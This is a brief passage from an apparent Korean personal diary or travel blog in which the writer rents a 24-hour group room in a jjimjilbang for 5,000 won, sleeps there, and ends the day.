찔질방내에 모임방이라는 방이 따로 있었는데 24시간에 5천원이란다 =_=;;
그냥 여기저기 누워서 자느니 그렇게 방을 하나 구해서 자는게 훨씬 괜찮아보여서 그렇게
방을 하나 얻어서 잤다..
그렇게 하루가 끝이 났다..